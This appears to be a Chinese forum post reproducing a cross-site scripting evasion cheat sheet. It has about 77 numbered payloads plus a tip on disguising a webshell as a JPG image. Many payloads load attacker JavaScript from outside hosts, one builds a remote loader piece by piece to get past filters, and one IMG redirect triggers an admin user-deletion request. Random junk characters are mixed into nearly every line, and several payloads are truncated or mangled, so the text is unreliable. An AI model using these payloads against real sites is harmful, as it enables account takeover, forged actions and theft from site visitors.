跨站图片shell
( z( x+ o- V R+ E5 ^( M) C4 uXSS跨站代码 <script>alert("")</script># y' j+ y8 C( L# A) w! |
9 }. E2 o" Y; S# E0 {. W将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
- d0 X+ N, Z: |# y3 X& [0 R7 C7 b* w6 ?7 M( _* d2 B& \
: Z, y5 v- V( }5 r& F7 g, q+ ~+ E) z0 ^& a
$ X3 {) z P" l. d& t
1)普通的XSS JavaScript注入
$ \( W* r# D- n& a$ N<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 B9 O7 Z/ ^# C k
: u( t+ F& C" L4 K& v
(2)IMG标签XSS使用JavaScript命令
4 L& p6 I; Y0 J' N$ X6 j<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>% o4 e" v) d. }- \
- Y( x4 Z/ i" R7 l(3)IMG标签无分号无引号6 A7 R$ u7 U2 }+ `* t2 }
<IMG SRC=javascript:alert(‘XSS’)>
9 W- q6 s9 v4 g& K5 Z
8 O9 [# ^1 K6 G, k(4)IMG标签大小写不敏感
2 T: }0 t! e3 W+ c9 m" t& |<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
; E; K/ r% T$ p; q2 P
. s" c% {. c! }1 C* w: S, x(5)HTML编码(必须有分号). y# s# k9 g( v3 c. N2 X) ^' ?
<IMG SRC=javascript:alert(“XSS”)>5 O) V! l; `$ S
/ x x4 r! ]$ D5 x4 [ a& c n
(6)修正缺陷IMG标签
% ~% }: g& n$ E/ F1 i0 {6 `<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! ~5 s2 F" n6 Y; e/ t# N# ~5 c0 v' j
n, `6 d2 P# ~1 L0 F9 Z(7)formCharCode标签(计算器)
! k( b* u" k, }4 x; }9 w' I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- T1 `$ i8 f) L8 n9 r+ l8 R" w( ~$ S! E
(8)UTF-8的Unicode编码(计算器)
. s3 t a9 j. U& C<IMG SRC=jav..省略..S')>
# R% Q( w, W/ o( u4 r5 Q) b' y! [8 U3 A8 R1 R0 l: t2 z
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ P5 P; t$ X9 x/ W% q A<IMG SRC=jav..省略..S')>0 M/ C0 W" s# l7 t( d0 u
& F1 R# B; ~/ d# L8 v3 }) c( M% u- }
(10)十六进制编码也是没有分号(计算器)
: t& ]5 ?, X1 V9 g5 z! i<IMG SRC=java..省略..XSS')>( r$ z/ x* j: n; X
. g; I% F# f/ ]! C" i$ ?7 L; K(11)嵌入式标签,将Javascript分开
' x3 d A. s3 ~( q0 `6 x) P) B<IMG SRC=”jav ascript:alert(‘XSS’);”>/ {# s2 g6 ^! X# K1 u# e3 @, Z
: r- Z) Z! g( c, m3 @: p5 ]1 o$ ?
(12)嵌入式编码标签,将Javascript分开6 e0 P9 }) ]2 z) J; p0 Y+ }- h4 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; F+ v+ \+ T' ]3 G% ~1 _! `3 y& E- W9 ?+ {! |* T7 W
(13)嵌入式换行符
L7 r" [5 U, B e<IMG SRC=”jav ascript:alert(‘XSS’);”>' E' J: X5 h7 i# `7 y2 m
+ ]6 B7 V+ \% |2 [; h9 Y
(14)嵌入式回车
/ o# \2 ?5 s& |* E( t: u( y<IMG SRC=”jav ascript:alert(‘XSS’);”>* g H/ q1 ~" @; e2 m( ^ U3 F5 |
( u6 d' X# s" S8 s
(15)嵌入式多行注入JavaScript,这是XSS极端的例子* A$ ?7 p& [0 ^8 u: m0 |( s: G; Z, s
<IMG SRC=”javascript:alert(‘XSS‘)”>. \+ ^( h) N: R
/ ?* x& q( ?9 V(16)解决限制字符(要求同页面)3 N* y7 V& u7 g f
<script>z=’document.’</script>: ^8 l0 r0 m2 `
<script>z=z+’write(“‘</script>$ q& P- m' ?! q* g; L; ^8 B4 D
<script>z=z+’<script’</script>- `- @$ t u8 K
<script>z=z+’ src=ht’</script>+ w- g, h% r- d7 g: X
<script>z=z+’tp://ww’</script># r# c, C- q$ a/ Q- V$ I: N
<script>z=z+’w.shell’</script>
! O& Z7 K C1 m5 G# G+ \/ u<script>z=z+’.net/1.’</script>
9 M6 ]4 a. K7 o. R( G<script>z=z+’js></sc’</script>
1 V6 X& H! Y4 {9 X; D<script>z=z+’ript>”)’</script>
- P/ b9 Z- J- V( l<script>eval_r(z)</script>
2 l7 j) V( f- k/ b
9 h1 B( e6 k# s* I(17)空字符) r7 o$ x l) T7 H* m9 \* Q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out `9 ?; _3 y" ?: j3 f9 A
6 Y ?- o3 D6 A _6 Y$ P% P
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用- R! O' r; w2 C5 H# e! W
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out9 L( x. D* K9 [1 f1 N; S
& ]* S7 M3 R( b- |8 G& a/ P
(19)Spaces和meta前的IMG标签
+ T0 }1 g4 P% F3 g2 |6 O# [<IMG SRC=” javascript:alert(‘XSS’);”>
* I/ p5 H' b- c, F2 r% h' m, U* E; m; d) l- Q7 R, X
(20)Non-alpha-non-digit XSS
8 w% G8 |5 _1 c$ }( _0 S<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
/ z2 _6 R5 V+ y( W
' [3 x0 o" C( [+ H(21)Non-alpha-non-digit XSS to 2; @7 T, I9 _& f. v* Y
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, i% K" p0 ]$ }; o p7 Y$ {$ H+ n! E6 D" q' A
(22)Non-alpha-non-digit XSS to 3( ?% o: h& T* w8 k, E1 A- X
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>$ W. T' |1 E1 ^- ^" c. j; C
" _( z# h9 v# @$ z n: Z( R+ r(23)双开括号
" ^) q) G1 u0 V& [' ^<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# r2 L3 x6 F5 u- @/ `, [5 f% s. N# s- f5 X9 O r$ n" o3 F$ L
(24)无结束脚本标记(仅火狐等浏览器)% j) Q! @# D4 l6 L
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. x& _9 F9 H/ M& C2 a4 X8 i4 V1 L2 W( d% `8 K& j
(25)无结束脚本标记2
% S/ `" k3 o+ W7 A/ Q<SCRIPT SRC=//3w.org/XSS/xss.js>
* P6 }! X" q) \9 E9 K
# w$ W! q* a& l! l5 t7 K7 Y$ I(26)半开的HTML/JavaScript XSS
6 q. r' Y2 Q. _. ]<IMG SRC=”javascript:alert(‘XSS’)”1 |) ], q# R/ M- u4 I' P6 @
4 {6 Z% a+ s- {( I0 [* U- q# Z$ m$ \/ `
(27)双开角括号, z1 A% w+ k7 ]8 ~5 E6 } e
<iframe src=http://3w.org/XSS.html <; p# y9 i6 T/ U$ e! u7 h
& B: g; U) I8 x! A* r
(28)无单引号 双引号 分号
4 ^$ g; ?! q! \% h<SCRIPT>a=/XSS/
* F9 A( C" p) t+ `alert(a.source)</SCRIPT>
2 n: o, q8 X6 q( N1 S c
9 P9 |$ N. R" L(29)换码过滤的JavaScript
7 x: E% A( P( ?4 k\”;alert(‘XSS’);//& c9 j4 K+ C4 G8 o- A7 M8 T
, R: L) T: o5 l% F& `" l) E
(30)结束Title标签
, V V$ {2 c3 O</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
0 }5 B0 l- b4 @4 Y! W- E; U7 W: M+ ]- }2 F* z) R
(31)Input Image
* K2 l' }4 Y$ A) i<INPUT SRC=”javascript:alert(‘XSS’);”>; K \) b2 g8 U4 _' Z" F
2 z( [ g" b8 m; U(32)BODY Image( {" E6 g$ I+ d8 O
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>5 A* a3 s8 F6 U* V! D( ]+ \* k" K
; B* X+ I' A* H0 o/ O0 F(33)BODY标签
, \( [7 I6 o4 _$ e<BODY(‘XSS’)>, M O- Y( |: Q$ F7 F ?& g
& `: g& j) R# A(34)IMG Dynsrc
$ a7 G. X& ~" z6 N9 c; h; Q( n<IMG DYNSRC=”javascript:alert(‘XSS’)”>
' i+ w2 O# t& n, k3 U8 ~1 r* w+ z8 N8 U$ {# B! [% L9 K
(35)IMG Lowsrc
4 w5 j2 s$ z) y" f' G1 C<IMG LOWSRC=”javascript:alert(‘XSS’)”>
' N: H. E0 J$ o0 a: J# u0 a6 P2 w V B( v' c
(36)BGSOUND
5 w6 Y5 d! K+ Q' ]7 R# n<BGSOUND SRC=”javascript:alert(‘XSS’);”>
! u& p5 C& e( r* |) a
' S3 d( D8 c7 i7 \/ }+ n- ^- c- [(37)STYLE sheet9 R; c5 u1 E9 B3 y, K5 F, H; W
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' F7 y1 c8 J- w: G; P1 Z' S
4 F) Q! m+ R/ Z(38)远程样式表' ^- K4 N% M( k% |, ^- [
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
/ d' t# T D1 a% U# V0 n E' j# n, f4 j) @7 r4 u' N, S# l
(39)List-style-image(列表式). a1 s% b5 a) e% a- \ o# J
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS x* D/ b7 Z: h; i; d
8 C' Y8 T" J# s8 H(40)IMG VBscript
) G0 n1 E& S2 v w/ H5 `. [<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
* |; d# x* k! V4 s2 n5 u6 p" \8 U+ u/ H6 e1 `
(41)META链接url
$ h! u4 _7 ?- z<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
2 x, I3 ]+ T4 g
1 S1 N! I7 h% v9 R(42)Iframe
- Z/ T* h6 H0 p# _- P, n4 u<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
# ^9 V: {- _- n h(43)Frame
; x( e$ s5 S5 {/ M _<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 q9 z% z4 d1 o$ O* [4 `! A8 O& g6 p3 n* b3 w7 c* I0 O8 W
(44)Table
8 w5 p4 e1 x& e+ W( t9 }* M<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
( S+ o. |. j3 k
3 k1 @( r# o; C- |" J(45)TD
- {9 w. I7 w K7 I! V<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
5 n4 `4 W: D/ B( R
. A0 d5 p* U6 {(46)DIV background-image$ O, X! u- f1 W+ w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
6 i& e' m( @# |8 A3 c1 @
- H( D2 v9 T2 X( O P: c* W* N3 o(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)- A$ V3 \8 E* b* g, \! V. }+ v `: i
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
8 k8 t; A3 {2 u/ ]# m: C0 j4 _4 J& s$ n, [0 m- k# x8 j* h
(48)DIV expression3 n. F8 H4 e2 }* @3 b
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ b: t1 S' f5 B1 Y$ s
. d, `; \% x; j! U' ]& I(49)STYLE属性分拆表达
% ]5 l- N+ k# l$ Q<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>1 G4 c6 m% n7 d3 D- a6 \- `
4 u5 N* R9 A: ~# E' C1 s5 {" f
(50)匿名STYLE(组成:开角号和一个字母开头)2 L# U" \5 [4 \' ?, X) Y2 y
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
0 I8 \6 L, f, s4 Y) @0 _: ?
6 a9 ?' l3 n+ w- M7 r9 A- Z4 s(51)STYLE background-image
+ f" q9 ~9 Y5 a( f" C" f<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>5 x& V7 b9 _. W/ @
3 h- j! R( o9 d3 ^; z' ^
(52)IMG STYLE方式
4 S; l" |$ Q, n% Wexppression(alert(“XSS”))’>0 Z% o: o$ B8 o; T& H
) l9 H: N* z' Y: ?(53)STYLE background
1 I9 n! g& U' s) x# y- O6 T<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE> W3 _& j/ n4 Z1 q
% O% F [' q$ {4 @1 o(54)BASE1 A/ C U2 c a( A' x
<BASE HREF=”javascript:alert(‘XSS’);//”>
D' t. q: J5 S# G" Y$ v) S
# V( | d4 d$ h/ {4 K" Q(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
& X' e, M5 r- c4 P<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ f* w% s& n$ c
* O. y4 n/ F u) T/ U0 b1 }/ `
(56)在flash中使用ActionScrpt可以混进你XSS的代码8 c' Y0 P9 F3 h. g3 S
a=”get”; H7 a# K9 r/ I9 j% u/ o9 N
b=”URL(\”";
3 C0 J# Y o0 G: E6 L% ^( ~c=”javascript:”;
/ y* x0 i, s: J& N% }( @# xd=”alert(‘XSS’);\”)”;# j# B7 o) w. u' y" U" f: o# c
eval_r(a+b+c+d);2 i" c) L! O1 e, L% E) y4 w
4 J5 I$ ^2 A1 u6 |5 k
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( g" @5 x. Y2 C: e<HTML xmlns:xss>9 ]0 p& H" m' O- f! _
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
. E% B/ H. a2 j: K) Z/ k! H<xss:xss>XSS</xss:xss>! T6 x$ e _; E% E! L& W
</HTML>
! A3 @# x2 }* c6 I3 P; ~6 Z9 g& S' `4 E* r8 K/ o5 O
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
* |: |5 b8 y. w% |8 B& ]8 u5 F<SCRIPT SRC=””></SCRIPT>% h# P% V' J0 M- s* ?
( C" @ _1 a! U3 }! _
(59)IMG嵌入式命令,可执行任意命令
/ r' h+ e N, x<IMG SRC=”http://www.XXX.com/a.php?a=b”>
8 U/ W) M2 v% ~
1 c+ Z( f, B" I# h3 p(60)IMG嵌入式命令(a.jpg在同服务器), u. k* P4 P; S5 n+ |! H f( D
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser; O0 q; N9 v) G* N6 g' p
; |1 E: E n2 r! H7 S+ x
(61)绕符号过滤2 o5 |& |( Q3 U8 c) y: {
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
" M# o2 ]0 l! T
$ `6 ]& _( ^3 e" e- Z; N7 J(62)) |7 I' m- T1 k2 L
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
) X4 P, j0 J- g" M; V
0 v4 G, s N5 j4 G0 t3 N$ O(63)
% _& ^0 b8 k8 L* i! s# i<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>% n$ G; {: J: G B. ^
# b' k4 y: f* [, b1 M0 `(64)
* q A7 {! {9 j$ i+ X3 ~' a<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
: M: ]& ^9 n( U. e7 e$ s
: t% }8 y" V( C$ s* [. n(65)2 S N8 ]9 H" b. |
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
' s" j3 I h c( t+ p# z+ k1 t9 \/ D% }) Z$ m
(66): m) V6 D6 Z% [7 C+ _$ G
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>. }" c1 I! ? [2 }' c- s# i
5 ^' _" ? k+ ]( E( B# ?9 `' N2 C(67)
+ e w& _; w6 f- b) C4 e<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>6 G) @* x, r7 O3 f# U3 x
" E* Z2 a- G+ p
(68)URL绕行
; C7 p% w2 v) p3 K<A HREF=”http://127.0.0.1/”>XSS</A>" t( ]2 S. z; K- ~8 `2 V5 |! j
1 U) `* z) M3 t) l) m) ^* c; \- f M(69)URL编码, d2 P: k) b) E& F3 L0 C: B
<A HREF=”http://3w.org”>XSS</A>/ J+ o3 N; L& Q* c4 v* w
0 c( y! J+ J4 B c( P K& d4 O5 Q
(70)IP十进制8 M- |) |. G/ T" \- }- L9 Z) n
<A HREF=”http://3232235521″>XSS</A>/ I& b0 i/ |) m: e" M/ v+ @- l
/ h1 G! U) ]+ t5 K8 F/ o
(71)IP十六进制
. J: ^+ r# r( L" T/ q<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>, I x* Z# g3 O, N% \
; u" R r% W; ]+ l1 t(72)IP八进制1 K# V5 ~7 b9 T% l& T1 x5 d
<A HREF=”http://0300.0250.0000.0001″>XSS</A>- b) x. `% D- @
( a, p4 F. x# V8 x+ M1 O6 _) `$ ?
(73)混合编码! G3 b) j0 b/ K+ e& y" k; s
<A HREF=”h3 c4 t3 Z+ s% B2 a) w
tt p://6 6.000146.0×7.147/”">XSS</A>
~: V5 ^+ g ~* s+ p) t
$ x$ j, L9 V6 x6 G. K% x(74)节省[http:]9 r# k4 [9 n' E. _0 S! n f3 e
<A HREF=”//www.google.com/”>XSS</A>
9 p" {+ P- r. m3 }
2 D+ W, M& L( g( s2 c6 T(75)节省[www]
& l; ]4 A% Y: A T' K<A HREF=”http://google.com/”>XSS</A>
( q) Z8 s' `" \' D _+ k A" ]2 @) O6 D/ ^6 G8 ^3 N+ ^
(76)绝对点绝对DNS6 ~$ U- X0 e5 K( D. H1 R3 J3 ?
<A HREF=”http://www.google.com./”>XSS</A>( r" `9 X- R X
/ }5 J8 l: l) h
(77)javascript链接
. u! k3 n" A9 V& V<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>' m- ^" l2 R3 S+ }+ g1 `
|